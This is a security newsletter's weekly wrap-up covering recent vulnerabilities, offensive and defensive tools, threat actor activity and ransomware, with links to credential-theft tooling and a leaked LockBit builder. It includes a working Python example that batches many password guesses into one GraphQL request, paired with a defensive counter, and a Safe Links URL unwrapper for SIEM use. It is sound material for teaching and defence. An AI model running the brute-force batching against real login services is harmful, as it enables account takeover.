This is Part 2 of the Weekend Wrap-Up, detailing significant vulnerabilities from the past week, in addition to the latest tools & techniques for offence and defence alike, and some additional reporting that you might find relevant and useful.
Part 1 should already be in your inbox, and highlights some significant Threat Actor Activity and noteworthy TTP changes to be aware of.
Headline Vulnerabilities
A flaw identified in Oracle’s Cloud offering - Oracle Cloud Infrastructure (OCI) - allowed users to access the virtual disks of other Oracle customers due to a lack of permissions verification in their AttachVolume API. To Oracle’s credit, they remediated the issue within 24 hours of disclosure, with no manual intervention or patching required from their customers;
The US Cybersecurity and Infrastructure Security Agency (CISA) warned of seven vulnerabilities in Dataprobe's iBoot-PDU power distribution unit which could enable remote code execution. The equipment is primarily used in industrial environments and data centers to control the power supply to devices and other equipment in an OT environment. Patches are available for anyone running this kit in their environment;
Researchers at Sansec have warned of a spike in exploitation attempts for CVE-2022-24086, a critical RCE vulnerability in Magento 2. Despite being disclosed in February with a warning from CISA of active exploitation issued soon thereafter, it seems this vulnerability is still doing the rounds. Full details can be found in Sansec’s report;
Sophos has warned that an RCE vulnerability (CVE-2022-3236) in the User Portal and Webadmin interface of Sophos Firewall is being exploited in the wild. The hotfix should be applied automatically under default settings, but you can also check to confirm it has made it to your appliance. While you’re at it, it’d be worthwhile checking that WAN access to those portals is disabled - you don’t want to be that guy.
Offensive
CrackQL - a GraphQL password brute-force and fuzzing utility that exploits poor rate-limit and cost analysis controls;
LDAPNomNom - Anonymously brute-force Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP);
AzureAttackKit - A collection of tools to pull down for attacking an Azure environment from a windows machine or Cloud Shell. Or if you’d prefer a more manual review for selective download - check out this thread;
JuicyPotatoNG - A revival of the beloved JuicyPotato tool to help elevate privileges from a Service Account to System;
Bookmark this blog post on the many ways you can come at attacking Cisco networks - there’s plenty in there for pentesters of all levels;
Azure AD Conditional Access - what is it, and how to find and exploit flaws in its policy design;
This post builds on Secureworks’ earlier post, and walks you through how to create backdoors and harvest Azure AD credentials through flaws in Azure AD Pass-through Authentication (PTA);
Check out this post that builds on SpecterOps’ amazing work looking at abusing AD CS for domain escalation;
TrustedSec take a look at Kerberos FAST - which wraps the pre-authentication exchange in an armor key derived from an existing TGT (typically the computer account’s), rather than relying solely on a key derived from the user’s password - and how mainstay tools like Rubeus and Impacket fare against it;
This is a really interesting walkthrough on how to relay YubiKey APDU packets (applicable to all PIV Smart Cards) to authenticate to remote systems;
How to pull Office JWT session tokens from memory and abuse them with the Outlook REST API (soon to be deprecated for Microsoft Graph API). If you want a script to help do it, here’s one in PowerShell & another in Python;
Remember GentilKiwi’s post from last week, noting that passwords are stored in user process memory when Citrix SSO is enabled? He’s just pushed a new release of Mimikatz that’ll help extract those creds. Check out this thread for more context;
Six bypasses for the FileBlockExecutable event type newly added in Sysmon v14;
Nestled in a huge thread on Azure Managed Identity attack paths, Andy Robbins has flagged that BARK’s Get-TierZeroServicePrincipals will help you discover all Azure Service Principals with Tier Zero privileges. It’s well worth reading the full thread for context on how and why this is useful;
Speaking of Azure attack paths - here’s a comprehensive post from Cloudbrothers looking at the myriad of ways you can come at it;
Andy Robbins has also used BARK to determine which Azure AD Admin and MS Graph App roles are abusable, and how.
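Circling back to the CrackQL item above: the weakness that class of tool leans on is GraphQL alias batching, where a rate limiter that counts HTTP requests, or a cost analyser that prices a field once regardless of how many times it is aliased, lets an attacker fold many login attempts into a single request. The following is an added example written for this wrap-up, not CrackQL’s own code; the `login(username, password) { token }` mutation shape and the server response are assumptions constructed for illustration. It builds the batched document, maps a response back to the guess that worked, and includes the defensive counterpart: counting root-level selections so a per-request budget can be enforced on the document rather than on the HTTP request.

```python
"""GraphQL alias batching: many login attempts in one request.

Added example, not CrackQL's code. The `login` mutation returning
`{ token }` is an assumed schema shape; adjust to the target.
"""
import json
import re

# Strip string literals before tokenising so braces/parens inside
# argument values do not confuse the depth tracking.
_STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')
_IDENT_RE = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")


def build_login_batch(username: str, passwords: list, mutation: str = "login",
                      alias_prefix: str = "a") -> str:
    """Return one mutation document carrying len(passwords) aliased attempts.

    Each guess gets its own alias (a0, a1, ...) so the responses can be told
    apart; from the server's point of view this is a single HTTP request.
    """
    selections = [
        f"{alias_prefix}{i}: {mutation}(username: {json.dumps(username)}, "
        f"password: {json.dumps(pw)}) {{ token }}"
        for i, pw in enumerate(passwords)
    ]
    return "mutation {\n  " + "\n  ".join(selections) + "\n}"


def successful_guesses(passwords: list, response: dict, alias_prefix: str = "a") -> list:
    """Map aliases in a (constructed) response back to the guesses that worked.

    Failed attempts normally come back as null plus an entry in `errors`;
    a non-null token under an alias means that password was accepted.
    """
    data = response.get("data") or {}
    return [pw for i, pw in enumerate(passwords)
            if (data.get(f"{alias_prefix}{i}") or {}).get("token")]


def count_top_level_selections(document: str) -> int:
    """Count root selections of an operation, aliased or not.

    Defensive side: weight cost by this number (or reject above a budget)
    instead of counting HTTP requests. Minimal tokenizer: an identifier at
    brace depth 1 and outside parentheses starts a root selection, except
    when it directly follows ':', which makes it the field behind an alias.
    """
    text = _STRING_RE.sub('""', document)
    brace = paren = count = 0
    prev_sig = ""  # last significant (non-whitespace) character
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "{":
            brace += 1
        elif ch == "}":
            brace -= 1
        elif ch == "(":
            paren += 1
        elif ch == ")":
            paren -= 1
        elif brace == 1 and paren == 0 and (m := _IDENT_RE.match(text, i)):
            if prev_sig != ":":
                count += 1
            prev_sig = m.group(0)[-1]
            i = m.end()
            continue
        if not ch.isspace():
            prev_sig = ch
        i += 1
    return count


# Constructed server response: only the second guess returned a token.
SAMPLE_GUESSES = ["winter2022", "Password1", "hunter2"]
SAMPLE_RESPONSE = {
    "data": {"a0": None, "a1": {"token": "eyJhbGciOiJub25lIn0.e30."}, "a2": None},
    "errors": [{"message": "bad credentials", "path": ["a0"]},
               {"message": "bad credentials", "path": ["a2"]}],
}

if __name__ == "__main__":
    doc = build_login_batch("alice", SAMPLE_GUESSES)
    print(doc)
    print("root selections:", count_top_level_selections(doc))
    print("worked:", successful_guesses(SAMPLE_GUESSES, SAMPLE_RESPONSE))
```

The same `count_top_level_selections` check applied server-side, with the batch size folded into the request’s cost, is what turns “one request, N guesses” back into “N requests”.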
Defensive
Microsoft have released Enhanced Phishing Protection in Windows 11 22H2, which aims to identify and mitigate corporate password entry on reported phishing sites or in apps connecting to phishing sites, password reuse on any app or site, and passwords typed into Notepad, Wordpad, or Microsoft 365 apps;
Something you hope you never have to use but will be glad to have on-hand - a detailed checklist of practical Ransomware response steps;
Set-SACL - A PowerShell wrapper for Roberto Rodriguez’s Set-AuditRule script. Set-SACL automates the identification of Cloud credentials and setting SACL on those files to monitor attempts to access them;
This thread has a bunch of useful tips and resources to help implement and monitor Azure MFA and Conditional Access policies for your enterprise;
A phishing campaign has highlighted the shortcomings of Microsoft’s Safe Links feature, with rewritten links giving users a false sense of security when it fails to detect a malicious site. For defenders, it’s worth ensuring the parsing rules feeding logs into your SIEM also account for Safe Links and extract the original URL for IOC matching and analysis - otherwise your indicators are compared against the wrapper, never the real destination!
The NSA have shared guidance for how to secure OT/ICS systems and assets.
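On the Safe Links point above: Safe Links rewrites each link in a message to `https://<region>.safelinks.protection.outlook.com/?url=<percent-encoded original>&data=...&sdata=...&reserved=0`, so the indicator you care about sits percent-encoded inside the `url` query parameter. The following is an added example written for this wrap-up, not Microsoft or vendor code. It peels the wrapper (including wrappers nested inside wrappers, which happens when mail is relayed through more than one tenant), leaves non-Safe-Links URLs untouched, and runs the rewrite over constructed sample log lines; the `wrap_safelink` helper exists only to build that constructed test data.

```python
"""Peel Microsoft Safe Links wrappers before IOC matching.

Added example, not Microsoft or vendor code. The sample log lines below
are constructed, not real telemetry.
"""
import re
from urllib.parse import parse_qs, quote, urlsplit

SAFELINKS_SUFFIX = ".safelinks.protection.outlook.com"
# Rough matcher for URLs embedded in free-text log lines; good enough here.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def is_safelink(url: str) -> bool:
    """True when the host is a Safe Links wrapper host (suffix match on the
    parsed hostname, so look-alike domains such as
    safelinks.protection.outlook.com.evil.example do not qualify)."""
    host = (urlsplit(url).hostname or "").lower()
    return host.endswith(SAFELINKS_SUFFIX)


def unwrap_safelink(url: str, max_depth: int = 5) -> str:
    """Return the destination behind a Safe Links wrapper.

    Anything that is not a wrapper comes back unchanged. Wrappers inside
    wrappers are peeled iteratively, bounded by max_depth. A wrapper without
    a usable `url` parameter is returned as-is rather than guessed at.
    """
    current = url
    for _ in range(max_depth):
        if not is_safelink(current):
            break
        target = parse_qs(urlsplit(current).query).get("url")  # percent-decoded
        if not target or not target[0]:
            break
        current = target[0]
    return current


def unwrap_in_text(text: str) -> str:
    """Replace every wrapper found in a log line with its real destination."""
    return URL_RE.sub(lambda m: unwrap_safelink(m.group(0)), text)


def wrap_safelink(target: str, region: str = "nam12") -> str:
    """Build a Safe Links-style wrapper around target (constructed test data)."""
    return (f"https://{region}{SAFELINKS_SUFFIX}/?url={quote(target, safe='')}"
            "&data=05%7C01%7Calice%40example.com%7C6380000&sdata=abc123&reserved=0")


# Constructed sample log lines, not real telemetry.
SAMPLE_LOG_LINES = [
    'user=alice action=click url="'
    + wrap_safelink("https://login.contoso-support.example/auth?session=abc")
    + '"',
    'user=bob action=click url="https://intranet.example.com/page"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        print(unwrap_in_text(line))
```

Run the unwrap before the URL is tokenised into host and path fields, and keep the wrapper alongside the decoded value if you need to prove later that Safe Links saw, and passed, the link.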
Threat Actor Activity & Reporting
Okta have reported a huge spike in credential stuffing attacks, with over 10 billion attempts against Okta’s services in the first 90 days of 2022 alone. While it’s a low-fi method that is significantly hampered by MFA, as we’ve seen in the 0ktapus campaign and Uber hacks - they can always socially engineer their way around it if they care enough to;
SentinelLabs have kicked off their inaugural LabsCon security conference with a report and technical appendix (Google Doc) for Metador - a stealthy Spanish-speaking group that has operated since 2020 but only recently been uncovered having targeted telcos, ISPs, and universities in the Middle East & Africa;
Microsoft have shared insights on an incident where malicious OAuth applications were deployed on a compromised tenant, enabling attackers to control Exchange Online settings and spread malicious spam from the victim’s Exchange environment;
This Dark Reading article highlights a recent trend of developers increasingly being targeted through the tools they use, such as Docker, Kubernetes, and Slack;
Australian telco Optus has disclosed a breach that compromised sensitive customer data, including passport and driver’s license numbers and physical addresses. The attacker says they retrieved 11.2 million customer records from an unauthenticated API, and has issued Optus an ultimatum: pay US$1 million in Monero or the data will be sold on the dark web;
The latest in the Uber hack saga - they’ve blamed the notorious Lapsus$ extortion group, who they say abused stolen credentials for a 3rd-party contractor and performed MFA Fatigue attacks to pop their networks. UK police also arrested a 17-year old teen in connection with the hack, with the recent compromise of game developer Rockstar also added to their charges.
Cyber Crime & Ransomware
The builder for LockBit 3.0, or “LockBit Black”, has been leaked online, sparking fears of copycats and widespread deployment of the ransomware beyond their approved affiliates - as if they weren’t prolific enough. Here’s the builder, one of the early blog posts looking at it, and some technical analysis to get you up to speed;
Security researchers have warned that ChromeLoader, historically dropped as a Chrome extension that harvests browser-stored creds, is now "used to also drop ransomware, steal sensitive data, and deploy so-called decompression (or zip) bombs to crash systems";
Aquasec report that the crypto-mining group TeamTNT - who ostensibly went offline in 2021 - have returned with three new attacks being used in the wild;
Researchers at Avast have taken a look at Roshtyak - the DLL backdoor used by the USB-borne trojan dubbed Raspberry Robin. Brace yourself - Roshtyak is stuffed into as many as 14 layers of obfuscation and anti-analysis measures - “one of the best-protected malware strains [Avast researchers] have ever seen”;
Trend Micro have released a detailed 46-page profile on the prolific Cyber Mercenary crew they track as Void Balaur;
Technical analysis of the Crytox ransomware.
Misc
Andy Robbins, the absolute Chad that he is, has shared this comprehensive thread on how Azure Managed Identity attack paths crop up and are exploited by attackers;
For orgs that have the right Microsoft 365 license and want to control and track sharing of sensitive emails and information - check out this walkthrough of Office Message Encryption and how to set it up;
Planning a large-scale deployment/lift-and-shift operation, or been asked to look into the use of Infrastructure-as-Code? NCC Group have released an exhaustive and well referenced article to help you step through the process;
Michael Taggart has shared a free sample (Part 1) of his course on Python for Defenders;
Talks from VeloCon 2022 - hosted by the makers of the Velociraptor DFIR toolkit - are available online.